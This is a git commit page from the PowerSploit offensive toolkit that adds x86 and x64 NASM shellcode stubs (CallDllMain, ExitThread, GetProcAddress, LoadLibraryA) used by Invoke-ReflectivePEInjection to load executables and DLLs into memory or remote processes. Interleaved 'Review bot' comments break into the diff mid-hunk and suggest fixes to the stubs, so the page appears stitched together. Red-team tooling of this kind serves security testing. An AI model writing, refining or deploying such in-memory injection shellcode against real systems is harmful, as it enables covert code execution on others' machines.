author | Matt Graeber <mattgraeber@gmail.com> | 2013-05-31 19:35:26 -0400 |
---|---|---|
committer | Matt Graeber <mattgraeber@gmail.com> | 2013-05-31 19:35:26 -0400 |
commit | dfec277813bfbc956dcac45345a9158093d68343 (patch) | |
tree | f205c4c4d6e81f33ace8086bbf63881ffc12dd51 /CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode | |
parent | 6e5338c8a34ade0ec0a4704031109fb5187620f8 (diff) | |
download | PowerSploit-dfec277813bfbc956dcac45345a9158093d68343.tar.gz PowerSploit-dfec277813bfbc956dcac45345a9158093d68343.zip |
Added Invoke-ReflectivePEInjection
Another awesome addition from Joe Bialek. Invoke-ReflectivePEInjection
is a vast improvement over Invoke-ReflectiveDllInjection. It adds the
following features:
* Now supports loading exe files in memory
* Supports reflective dll injection into a remote process
* Additional sample Visual Studio solutions
Diffstat (limited to 'CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode')
8 files changed, 160 insertions, 0 deletions
diff --git a/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/readme.txt b/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/readme.txt
new file mode 100644
index 0000000..1454ca8
--- /dev/null
+++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/readme.txt
@@ -0,0 +1,12 @@
+This contains the assembly code I used to build the shellcode the PowerShell script uses. Some of the assembly isn't included beause I didn't save it, this should just be for the SUPER easy stuff like moving an address to EAX and returning.
+
+Compile:
+x64:
+nasm -f elf64 FileName.asm
+ld -o FileName FileName.o
+objdump -M intel -d FileName
+
+x86:
+nasm FileName.asm
+ld -o FileName FileName.o
+objdump -M intel -d FileName
\ No newline at end of file
diff --git a/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/CallDllMain.asm b/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/CallDllMain.asm
new file mode 100644
index 0000000..02d6848
--- /dev/null
+++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/CallDllMain.asm
@@ -0,0 +1,20 @@
+[SECTION .text]
+global _start
+
+_start:
+ ; Get stack setup
+ push rbx
+ mov rbx, rsp
+ and sp, 0xff00
+
+ ; Call DllMain
+ mov rcx, 0x4141414141414141 ; DLLHandle, set by PowerShell
+ mov rdx, 0x1 ; PROCESS_ATTACH
+ mov r8, 0x0 ; NULL
+ mov rax, 0x4141414141414141 ; Address of DllMain, set by PS
+ call rax
+
+ ; Fix stack
+ mov rsp, rbx
+ pop rbx
+ ret
diff --git a/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/ExitThread.asm b/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/ExitThread.asm
new file mode 100644
index 0000000..d16cbc9
--- /dev/null
+++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/ExitThread.asm
@@ -0,0 +1,14 @@
+[SECTION .text]
+
+global _start
+
+_start:
+ ; Set a var to 1, let PS known exe is exiting
+ mov rbx, 0x4141414141414141
+ mov [rbx], byte 0x01
+
+ ; Call exitthread instead of exitprocess
+ sub rsp, 0xc0
+ and sp, 0xFFf0 ; Needed for stack alignment
+ mov rbx, 0x4141414141414141
+ call rbx
diff --git a/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/GetFuncAddress.asm b/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/GetFuncAddress.asm
new file mode 100644
index 0000000..edeffd6
--- /dev/null
+++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/GetFuncAddress.asm
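Review bot: The x64 CallDllMain stub reserves no shadow space before `call rax`: `and sp, 0xff00` only aligns rsp, so whenever that alignment lowers rsp by fewer than 32 bytes, the 32-byte spill area the Microsoft x64 convention lets DllMain write its register arguments into overlaps the pushed rbx and the caller's frame above it. The sibling x64 stubs in this commit (GetFuncAddress, LoadLibraryA) already do `sub rsp, 0x20` before aligning; the same line belongs before the `and` here. Separately, `and sp, …` in all four x64 stubs (CallDllMain, ExitThread, GetFuncAddress, LoadLibraryA) is a 16-bit operand-size write to the stack pointer, a partial-register form that reads oddly for what is a 64-bit alignment; `and rsp, -0x10` (or `-0x40`) is the usual spelling and leaves no doubt about the mask. `mov r8, 0x0` would conventionally be `xor r8d, r8d`.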
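Review bot: The x64 ExitThread stub reaches `call rbx` without setting the exit-code argument: nothing in the stub writes rcx, so the thread's exit code is whatever the preceding code left there; `xor ecx, ecx` before the call pins it to 0. The x86 ExitThread stub has the same gap, with no `push` of the dword argument before `call ebx`. Since the callee does not return, the unsaved rbx and missing epilogue are intentional, and a one-line comment such as `; ExitThread does not return, so no epilogue is needed` would keep the next reader from "fixing" it. The comment `let PS known exe is exiting` should read `let PS know the exe is exiting`.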
@@ -0,0 +1,27 @@
+[SECTION .text]
+
+global _start
+
+_start:
+ ; Save state of rbx and stack
+ push rbx
+ mov rbx, rsp
+
+ ; Set up stack for function call to GetProcAddress
+ sub rsp, 0x20
+ and sp, 0xffc0
+
+ ; Call getprocaddress
+ mov rcx, 0x4141414141414141 ; DllHandle, set by PS
+ mov rdx, 0x4141414141414141 ; Ptr to FuncName string, set by PS
+ mov rax, 0x4141414141414141 ; GetProcAddress address, set by PS
+ call rax
+
+ ; Store the result
+ mov rcx, 0x4141414141414141 ; Ptr to buffer to save result,set by PS
+ mov [rcx], rax
+
+ ; Restore stack
+ mov rsp, rbx
+ pop rbx
+ ret
diff --git a/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/LoadLibraryA.asm b/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/LoadLibraryA.asm
new file mode 100644
index 0000000..7f16471
--- /dev/null
+++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/LoadLibraryA.asm
@@ -0,0 +1,23 @@
+[SECTION .text]
+
+global _start
+
+_start:
+ ; Save rsp and setup stack for function call
+ push rbx
+ mov rbx, rsp
+ sub rsp, 0x20
+ and sp, 0xffc0
+
+ ; Call LoadLibraryA
+ mov rcx, 0x4141414141414141 ; Ptr to string of library, set by PS
+ mov rdx, 0x4141414141414141 ; Address of LoadLibrary, set by PS
+ call rdx
+
+ mov rdx, 0x4141414141414141 ; Ptr to save result, set by PS
+ mov [rdx], rax
+
+ ; Fix stack
+ mov rsp, rbx
+ pop rbx
+ ret
diff --git a/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/CallDllMain.asm b/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/CallDllMain.asm
new file mode 100644
index 0000000..41b1034
--- /dev/null
+++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/CallDllMain.asm
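Review bot: Neither x64 stub (GetFuncAddress here, LoadLibraryA in the next hunk) carries a file header stating what a reader needs before editing it: NASM syntax, x86-64, that the callee follows the Microsoft x64 calling convention, which registers the stub itself overwrites (rax, rcx, rdx; rbx preserved by the push/pop, rsp restored from rbx), and that the `0x4141414141414141` immediates are placeholders the PowerShell script overwrites. A header along the lines of `; NASM, x86-64; callee uses the MS x64 ABI; 0x41..41 immediates are patched in by the PowerShell script` on both files would cover it; the `global _start` label presumably exists only so the readme's `ld` step links, which is worth a line too. The x64 file is named GetFuncAddress.asm while its x86 counterpart is GetProcAddress.asm and its own comment says `Call getprocaddress`; one name across both would help.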
@@ -0,0 +1,23 @@
+[SECTION .text]
+global _start
+
+_start:
+ ; Get stack setup
+ push ebx
+ mov ebx, esp
+ and esp, 0xfffffff0
+
+ ; Call DllMain
+ mov ecx, 0x41414141 ; DLLHandle, set by PowerShell
+ mov edx, 0x1 ; PROCESS_ATTACH
+ mov eax, 0x0 ; NULL
+ push eax
+ push edx
+ push ecx
+ mov eax, 0x41414141 ; Address of DllMain, set by PS
+ call eax
+
+ ; Fix stack
+ mov esp, ebx
+ pop ebx
+ ret
diff --git a/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/ExitThread.asm b/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/ExitThread.asm
new file mode 100644
index 0000000..ce66543
--- /dev/null
+++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/ExitThread.asm
@@ -0,0 +1,13 @@
+[SECTION .text]
+global _start
+
+_start:
+ ; Set a var to 1, let PS know the EXE is exiting
+ mov ebx, 0x41414141
+ mov [ebx], byte 0x01
+
+ ; Call exitthread instead of exit process
+ sub esp, 0x20
+ and esp, 0xFFFFFFc0 ; Needed for stack alignment
+ mov ebx, 0x41414141
+ call ebx
diff --git a/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/GetProcAddress.asm b/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/GetProcAddress.asm
new file mode 100644
index 0000000..bf2ac9e
--- /dev/null
+++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/GetProcAddress.asm
@@ -0,0 +1,28 @@
+[SECTION .text]
+
+global _start
+
+_start:
+ ; Save state of ebx and stack
+ push ebx
+ mov ebx, esp
+
+ ; Align stack
+ and esp, 0xffffffc0
+
+ ; Call GetProcAddress
+ mov eax, 0x41414141 ; DllHandle, supplied by PS
+ mov ecx, 0x41414141 ; Function name, supplied by PS
+ push ecx
+ push eax
+ mov eax, 0x41414141 ; GetProcAddress address, supplied by PS
+ call eax
+
+ ; Write GetProcAddress return value to an address supplied by PS
+ mov ecx, 0x41414141 ; Address supplied by PS
+ mov [ecx], eax
+
+ ; Fix stack
+ mov esp, ebx
+ pop ebx
+ ret |
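Review bot: The three x86 stubs spell the same things three ways: the alignment mask is `0xfffffff0` in CallDllMain but `0xFFFFFFc0` in ExitThread and `0xffffffc0` in GetProcAddress (mixed hex casing, and 16-byte versus 64-byte alignment with no stated reason for the difference), and zero is loaded with `mov eax, 0x0` where `xor eax, eax` is the idiom (the x64 CallDllMain's `mov r8, 0x0` likewise). The `; Align stack` and `; Needed for stack alignment` comments would carry more information as `; 16-byte align` or `; 64-byte align`, so the mask reads as chosen rather than copied. DllMain and GetProcAddress are stdcall, so the callee pops its own arguments; a comment noting that `mov esp, ebx` is what actually discards the pushed arguments in the error-free path keeps the `push`es and the restore from looking redundant.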